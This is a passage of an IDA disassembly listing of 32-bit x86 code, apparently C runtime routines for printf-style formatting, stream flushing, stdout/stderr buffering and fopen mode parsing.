dec eax
jz short loc_41A0BC
dec eax
dec eax
jz short loc_41A0BC
sub eax, 0Ch
jnz loc_41A442
test word ptr [ebp+var_4], 830h
jnz short loc_41A065
or byte ptr [ebp+var_4+1], 8
loc_41A065: ; CODE XREF: sub_419E38+227�j
; sub_419E38+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_41A072
mov esi, 7FFFFFFFh
loc_41A072: ; CODE XREF: sub_419E38+233�j
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_41A28B
test ecx, ecx
jnz short loc_41A09A
mov ecx, ds:off_43959C
mov [ebp+var_8], ecx
loc_41A09A: ; CODE XREF: sub_419E38+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_41A0A3: ; CODE XREF: sub_419E38+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_41A282
cmp word ptr [eax], 0
jz loc_41A282
inc eax
inc eax
jmp short loc_41A0A3
; ---------------------------------------------------------------------------
loc_41A0BC: ; CODE XREF: sub_419E38+212�j
; sub_419E38+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_41A0C6: ; CODE XREF: sub_419E38+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_41A1AA
mov [ebp+var_10], 6
jmp loc_41A1B8
; ---------------------------------------------------------------------------
loc_41A0E7: ; CODE XREF: sub_419E38+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_41A0F3
or byte ptr [ebp+var_4+1], 8
loc_41A0F3: ; CODE XREF: sub_419E38+2B5�j
; sub_419E38+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_41A13A
call sub_41A634
push eax
lea eax, [ebp+var_248]
push eax
call sub_41FAFB
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_41A14D
mov [ebp+var_28], 1
jmp short loc_41A14D
; ---------------------------------------------------------------------------
loc_41A124: ; CODE XREF: sub_419E38+1FB�j
sub eax, 5Ah
jz short loc_41A15B
sub eax, 9
jz short loc_41A0F3
dec eax
jz loc_41A31D
jmp loc_41A442
; ---------------------------------------------------------------------------
loc_41A13A: ; CODE XREF: sub_419E38+2C5�j
call sub_41A617
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_41A14D: ; CODE XREF: sub_419E38+2E1�j
; sub_419E38+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_41A442
; ---------------------------------------------------------------------------
loc_41A15B: ; CODE XREF: sub_419E38+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test eax, eax
pop ecx
jz short loc_41A19C
mov ecx, [eax+4]
test ecx, ecx
jz short loc_41A19C
test byte ptr [ebp+var_4+1], 8
jz short loc_41A18D
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_41A442
; ---------------------------------------------------------------------------
loc_41A18D: ; CODE XREF: sub_419E38+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A19C: ; CODE XREF: sub_419E38+32F�j
; sub_419E38+336�j
mov eax, ds:off_439598
mov [ebp+var_8], eax
push eax
jmp loc_41A238
; ---------------------------------------------------------------------------
loc_41A1AA: ; CODE XREF: sub_419E38+29D�j
jnz short loc_41A1B8
cmp bl, 67h
jnz short loc_41A1B8
mov [ebp+var_10], 1
loc_41A1B8: ; CODE XREF: sub_419E38+2AA�j
; sub_419E38:loc_41A1AA�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call ds:off_43B900
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41A20A
cmp [ebp+var_10], 0
jnz short loc_41A20A
lea eax, [ebp+var_248]
push eax
call ds:off_43B90C
pop ecx
loc_41A20A: ; CODE XREF: sub_419E38+3BC�j
; sub_419E38+3C2�j
cmp bl, 67h
jnz short loc_41A221
test esi, esi
jnz short loc_41A221
lea eax, [ebp+var_248]
push eax
call ds:off_43B904
pop ecx
loc_41A221: ; CODE XREF: sub_419E38+3D5�j
; sub_419E38+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_41A237
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_41A237: ; CODE XREF: sub_419E38+3F0�j
push edi
loc_41A238: ; CODE XREF: sub_419E38+36D�j
call sub_417AB0
pop ecx
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A243: ; CODE XREF: sub_419E38+1E9�j
sub eax, 69h
jz loc_41A31D
sub eax, 5
jz loc_41A2F3
dec eax
jz loc_41A2E0
dec eax
jz short loc_41A2B0
sub eax, 3
jz loc_41A065
dec eax
dec eax
jz loc_41A321
sub eax, 3
jnz loc_41A442
mov [ebp+var_2C], 27h
jmp short loc_41A2BE
; ---------------------------------------------------------------------------
loc_41A282: ; CODE XREF: sub_419E38+270�j
; sub_419E38+27A�j
sub eax, ecx
sar eax, 1
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A28B: ; CODE XREF: sub_419E38+24F�j
test ecx, ecx
jnz short loc_41A298
mov ecx, ds:off_439598
mov [ebp+var_8], ecx
loc_41A298: ; CODE XREF: sub_419E38+455�j
mov eax, ecx
loc_41A29A: ; CODE XREF: sub_419E38+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_41A2A9
cmp byte ptr [eax], 0
jz short loc_41A2A9
inc eax
jmp short loc_41A29A
; ---------------------------------------------------------------------------
loc_41A2A9: ; CODE XREF: sub_419E38+467�j
; sub_419E38+46C�j
sub eax, ecx
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A2B0: ; CODE XREF: sub_419E38+425�j
mov [ebp+var_10], 8
loc_41A2B7: ; CODE XREF: sub_419E38+201�j
mov [ebp+var_2C], 7
loc_41A2BE: ; CODE XREF: sub_419E38+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_41A328
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_41A328
; ---------------------------------------------------------------------------
loc_41A2E0: ; CODE XREF: sub_419E38+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_41A328
or byte ptr [ebp+var_4+1], 2
jmp short loc_41A328
; ---------------------------------------------------------------------------
loc_41A2F3: ; CODE XREF: sub_419E38+417�j
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_41A30C
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_41A311
; ---------------------------------------------------------------------------
loc_41A30C: ; CODE XREF: sub_419E38+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_41A311: ; CODE XREF: sub_419E38+4D2�j
mov [ebp+var_28], 1
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_41A31D: ; CODE XREF: sub_419E38+2F7�j
; sub_419E38+40E�j
or [ebp+var_4], 40h
loc_41A321: ; CODE XREF: sub_419E38+432�j
mov [ebp+var_C], 0Ah
loc_41A328: ; CODE XREF: sub_419E38+491�j
; sub_419E38+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41A33A
lea eax, [ebp+arg_8]
push eax
call sub_41A624
pop ecx
jmp short loc_41A37B
; ---------------------------------------------------------------------------
loc_41A33A: ; CODE XREF: sub_419E38+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_41A361
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41A356
call sub_41A617
pop ecx
movsx eax, ax
loc_41A353: ; CODE XREF: sub_419E38+527�j
; sub_419E38+539�j
cdq
jmp short loc_41A37B
; ---------------------------------------------------------------------------
loc_41A356: ; CODE XREF: sub_419E38+510�j
call sub_41A617
pop ecx
movzx eax, ax
jmp short loc_41A353
; ---------------------------------------------------------------------------
loc_41A361: ; CODE XREF: sub_419E38+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41A373
call sub_41A617
pop ecx
jmp short loc_41A353
; ---------------------------------------------------------------------------
loc_41A373: ; CODE XREF: sub_419E38+531�j
call sub_41A617
pop ecx
xor edx, edx
loc_41A37B: ; CODE XREF: sub_419E38+500�j
; sub_419E38+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_41A39C
test edx, edx
jg short loc_41A39C
jl short loc_41A38B
test eax, eax
jnb short loc_41A39C
loc_41A38B: ; CODE XREF: sub_419E38+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_41A3A0
; ---------------------------------------------------------------------------
loc_41A39C: ; CODE XREF: sub_419E38+547�j
; sub_419E38+54B�j ...
mov esi, eax
mov edi, edx
loc_41A3A0: ; CODE XREF: sub_419E38+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_41A3A9
and edi, 0
loc_41A3A9: ; CODE XREF: sub_419E38+56C�j
cmp [ebp+var_10], 0
jge short loc_41A3B8
mov [ebp+var_10], 1
jmp short loc_41A3BC
; ---------------------------------------------------------------------------
loc_41A3B8: ; CODE XREF: sub_419E38+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_41A3BC: ; CODE XREF: sub_419E38+57E�j
mov eax, esi
or eax, edi
jnz short loc_41A3C6
and [ebp+var_1C], 0
loc_41A3C6: ; CODE XREF: sub_419E38+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_41A3CC: ; CODE XREF: sub_419E38+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_41A3DC
mov eax, esi
or eax, edi
jz short loc_41A417
loc_41A3DC: ; CODE XREF: sub_419E38+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_4191D0
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_419250
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_41A40D
add ebx, [ebp+var_2C]
loc_41A40D: ; CODE XREF: sub_419E38+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_41A3CC
; ---------------------------------------------------------------------------
loc_41A417: ; CODE XREF: sub_419E38+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_41A442
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_41A435
test eax, eax
jnz short loc_41A442
loc_41A435: ; CODE XREF: sub_419E38+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_41A43F: ; CODE XREF: sub_419E38+35F�j
; sub_419E38+406�j ...
mov [ebp+var_C], eax
loc_41A442: ; CODE XREF: sub_419E38+21B�j
; sub_419E38+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_41A540 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_41A47A
test bh, 1
jz short loc_41A45F
mov [ebp+var_16], 2Dh
jmp short loc_41A473
; ---------------------------------------------------------------------------
loc_41A45F: ; CODE XREF: sub_419E38+61F�j
test bl, 1
jz short loc_41A46A
mov [ebp+var_16], 2Bh
jmp short loc_41A473
; ---------------------------------------------------------------------------
loc_41A46A: ; CODE XREF: sub_419E38+62A�j
test bl, 2
jz short loc_41A47A
mov [ebp+var_16], 20h
loc_41A473: ; CODE XREF: sub_419E38+625�j
; sub_419E38+630�j
mov [ebp+var_1C], 1
loc_41A47A: ; CODE XREF: sub_419E38+61A�j
; sub_419E38+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_41A49A
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41A5AE
add esp, 10h
loc_41A49A: ; CODE XREF: sub_419E38+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_41A5DF
add esp, 10h
test bl, 8
jz short loc_41A4CC
test bl, 4
jnz short loc_41A4CC
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_41A5AE
add esp, 10h
loc_41A4CC: ; CODE XREF: sub_419E38+67B�j
; sub_419E38+680�j
cmp [ebp+var_24], 0
jz short loc_41A513
cmp [ebp+var_C], 0
jle short loc_41A513
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_41A4E1: ; CODE XREF: sub_419E38+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_41FAFB
pop ecx
test eax, eax
pop ecx
jle short loc_41A528
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_41A5DF
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_41A4E1
jmp short loc_41A528
; ---------------------------------------------------------------------------
loc_41A513: ; CODE XREF: sub_419E38+698�j
; sub_419E38+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_41A5DF
add esp, 10h
loc_41A528: ; CODE XREF: sub_419E38+6BC�j
; sub_419E38+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_41A540 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41A5AE
add esp, 10h
loc_41A540: ; CODE XREF: sub_419E38+68�j
; sub_419E38+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_419E64
loc_41A551: ; CODE XREF: sub_419E38+1F�j
; sub_419E38+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_419E38 endp
; ---------------------------------------------------------------------------
off_41A559 dd offset loc_419FD7 ; DATA XREF: sub_419E38+6E�r
dd offset loc_419EAD ; jump table for switch statement
dd offset loc_419EC8
dd offset loc_419F14
dd offset loc_419F4B
dd offset loc_419F53
dd offset loc_419F88
dd offset loc_41A01B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A579 proc near ; CODE XREF: sub_419E38+1BD�p
; sub_419E38+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_41A592
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_41A59D
; ---------------------------------------------------------------------------
loc_41A592: ; CODE XREF: sub_41A579+9�j
push ecx
push [ebp+arg_0]
call sub_419D23
pop ecx
pop ecx
loc_41A59D: ; CODE XREF: sub_41A579+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_41A5AA
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A5AA: ; CODE XREF: sub_41A579+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_41A579 endp
; =============== S U B R O U T I N E =======================================
sub_41A5AE proc near ; CODE XREF: sub_419E38+65A�p
; sub_419E38+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_41A5DC
mov esi, [esp+8+arg_C]
loc_41A5BF: ; CODE XREF: sub_41A5AE+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_41A579
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41A5DC
mov eax, edi
dec edi
test eax, eax
jg short loc_41A5BF
loc_41A5DC: ; CODE XREF: sub_41A5AE+B�j
; sub_41A5AE+25�j
pop edi
pop esi
retn
sub_41A5AE endp
; =============== S U B R O U T I N E =======================================
sub_41A5DF proc near ; CODE XREF: sub_419E38+670�p
; sub_419E38+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_41A613
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_41A5F5: ; CODE XREF: sub_41A5DF+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_41A579
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_41A613
mov eax, ebx
dec ebx
test eax, eax
jg short loc_41A5F5
loc_41A613: ; CODE XREF: sub_41A5DF+C�j
; sub_41A5DF+2B�j
pop edi
pop esi
pop ebx
retn
sub_41A5DF endp
; =============== S U B R O U T I N E =======================================
sub_41A617 proc near ; CODE XREF: sub_419E38+E5�p
; sub_419E38+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_41A617 endp
; =============== S U B R O U T I N E =======================================
sub_41A624 proc near ; CODE XREF: sub_419E38+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_41A624 endp
; =============== S U B R O U T I N E =======================================
sub_41A634 proc near ; CODE XREF: sub_419E38+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_41A634 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A642 proc near ; CODE XREF: sub_417794+17�p
; sub_417794+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_41A660
mov ecx, ds:off_4395A0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_41A6B2
; ---------------------------------------------------------------------------
loc_41A660: ; CODE XREF: sub_41A642+10�j
mov ecx, eax
push esi
mov esi, ds:off_4395A0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_41A685
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_41A68E
; ---------------------------------------------------------------------------
loc_41A685: ; CODE XREF: sub_41A642+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_41A68E: ; CODE XREF: sub_41A642+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41FB63
add esp, 1Ch
test eax, eax
jnz short loc_41A6AE
leave
retn
; ---------------------------------------------------------------------------
loc_41A6AE: ; CODE XREF: sub_41A642+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_41A6B2: ; CODE XREF: sub_41A642+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_41A642 endp
; =============== S U B R O U T I N E =======================================
sub_41A6B7 proc near ; CODE XREF: sub_417900+2A�p
; sub_41FEC6+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, ds:dword_48B440
jnb loc_41A751
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:48B340h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41A751
push edi
call sub_41FE32
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41A730
cmp edi, 1
jz short loc_41A6FE
cmp edi, 2
jnz short loc_41A714
loc_41A6FE: ; CODE XREF: sub_41A6B7+40�j
push 2
call sub_41FE32
push 1
mov ebp, eax
call sub_41FE32
pop ecx
cmp eax, ebp
pop ecx
jz short loc_41A730
loc_41A714: ; CODE XREF: sub_41A6B7+45�j
push edi
call sub_41FE32
pop ecx
push eax
call ds:off_424078
test eax, eax
jnz short loc_41A730
call ds:dword_42408C ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_41A732
; ---------------------------------------------------------------------------
loc_41A730: ; CODE XREF: sub_41A6B7+3B�j
; sub_41A6B7+5B�j ...
xor ebp, ebp
loc_41A732: ; CODE XREF: sub_41A6B7+77�j
push edi
call sub_41FDB8
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41A74D
push ebp
call sub_41EF44
pop ecx
jmp short loc_41A762
; ---------------------------------------------------------------------------
loc_41A74D: ; CODE XREF: sub_41A6B7+8B�j
xor eax, eax
jmp short loc_41A765
; ---------------------------------------------------------------------------
loc_41A751: ; CODE XREF: sub_41A6B7+E�j
; sub_41A6B7+2F�j
and ds:dword_48A018, 0
mov ds:dword_48A014, 9
loc_41A762: ; CODE XREF: sub_41A6B7+94�j
or eax, 0FFFFFFFFh
loc_41A765: ; CODE XREF: sub_41A6B7+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41A6B7 endp
; =============== S U B R O U T I N E =======================================
sub_41A76A proc near ; CODE XREF: sub_417900+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41A793
test al, 8
jz short loc_41A793
push dword ptr [esi+8]
call sub_417C3B
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41A793: ; CODE XREF: sub_41A76A+A�j
; sub_41A76A+E�j
pop esi
retn
sub_41A76A endp
; =============== S U B R O U T I N E =======================================
sub_41A795 proc near ; CODE XREF: sub_41A835+2D�p
; sub_41A835+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_41A7A7
push esi
call sub_41A835
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A7A7: ; CODE XREF: sub_41A795+7�j
push esi
call sub_41A7D0
test eax, eax
pop ecx
jz short loc_41A7B7
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A7B7: ; CODE XREF: sub_41A795+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41A7CC
push dword ptr [esi+10h]
call sub_41FE6F
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A7CC: ; CODE XREF: sub_41A795+26�j
xor eax, eax
pop esi
retn
sub_41A795 endp
; =============== S U B R O U T I N E =======================================
sub_41A7D0 proc near ; CODE XREF: sub_417900+1A�p
; sub_418D0E+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41A81D
test ax, 108h
jz short loc_41A81D
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41A81D
push edi
push eax
push dword ptr [esi+10h]
call sub_41ED97
add esp, 0Ch
cmp eax, edi
jnz short loc_41A816
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41A81D
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41A81D
; ---------------------------------------------------------------------------
loc_41A816: ; CODE XREF: sub_41A7D0+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41A81D: ; CODE XREF: sub_41A7D0+14�j
; sub_41A7D0+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41A7D0 endp
; =============== S U B R O U T I N E =======================================
sub_41A82C proc near ; CODE XREF: sub_41FAE7�p
push 1
call sub_41A835
pop ecx
retn
sub_41A82C endp
; =============== S U B R O U T I N E =======================================
sub_41A835 proc near ; CODE XREF: sub_41A795+A�p
; sub_41A82C+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp ds:dword_48B320, esi
jle short loc_41A893
loc_41A846: ; CODE XREF: sub_41A835+5C�j
mov eax, ds:dword_48A310
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41A88A
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41A88A
cmp [esp+0Ch+arg_0], 1
jnz short loc_41A870
push eax
call sub_41A795
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41A88A
inc ebx
jmp short loc_41A88A
; ---------------------------------------------------------------------------
loc_41A870: ; CODE XREF: sub_41A835+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_41A88A
test cl, 2
jz short loc_41A88A
push eax
call sub_41A795
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41A88A
or edi, eax
loc_41A88A: ; CODE XREF: sub_41A835+1B�j
; sub_41A835+23�j ...
inc esi
cmp esi, ds:dword_48B320
jl short loc_41A846
loc_41A893: ; CODE XREF: sub_41A835+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_41A89E
mov eax, edi
loc_41A89E: ; CODE XREF: sub_41A835+65�j
pop edi
pop esi
pop ebx
retn
sub_41A835 endp
; =============== S U B R O U T I N E =======================================
sub_41A8A2 proc near ; CODE XREF: sub_417956+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41FA1C
test eax, eax
pop ecx
jz short loc_41A92B
cmp esi, offset dword_43BCD8
jnz short loc_41A8C0
xor eax, eax
jmp short loc_41A8CB
; ---------------------------------------------------------------------------
loc_41A8C0: ; CODE XREF: sub_41A8A2+18�j
cmp esi, offset dword_43BCF8
jnz short loc_41A92B
push 1
pop eax
loc_41A8CB: ; CODE XREF: sub_41A8A2+1C�j
inc ds:dword_48A1D8
test word ptr [esi+0Ch], 10Ch
jnz short loc_41A92B
cmp ds:dword_48A06C[eax*4], 0
push ebx
push edi
lea edi, ds:48A06Ch[eax*4]
mov ebx, 1000h
jnz short loc_41A911
push ebx
call sub_417B89
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41A911
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41A91E
; ---------------------------------------------------------------------------
loc_41A911: ; CODE XREF: sub_41A8A2+4D�j
; sub_41A8A2+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_41A91E: ; CODE XREF: sub_41A8A2+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A92B: ; CODE XREF: sub_41A8A2+10�j
; sub_41A8A2+24�j ...
xor eax, eax
pop esi
retn
sub_41A8A2 endp
; =============== S U B R O U T I N E =======================================
sub_41A92F proc near ; CODE XREF: sub_417956+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_41A959
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41A96A
push esi
call sub_41A7D0
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A959: ; CODE XREF: sub_41A92F+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_41A96A
push eax
call sub_41A7D0
pop ecx
loc_41A96A: ; CODE XREF: sub_41A92F+10�j
; sub_41A92F+32�j
pop esi
retn
sub_41A92F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A96C proc near ; CODE XREF: sub_417988+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:dword_48A1E0
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_41A9A5
cmp al, 72h
jz short loc_41A99E
cmp al, 77h
jnz loc_41AAB9
mov ecx, 301h
jmp short loc_41A9AA
; ---------------------------------------------------------------------------
loc_41A99E: ; CODE XREF: sub_41A96C+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41A9AD
; ---------------------------------------------------------------------------
loc_41A9A5: ; CODE XREF: sub_41A96C+1D�j
mov ecx, 109h
loc_41A9AA: ; CODE XREF: sub_41A96C+30�j
or esi, 2
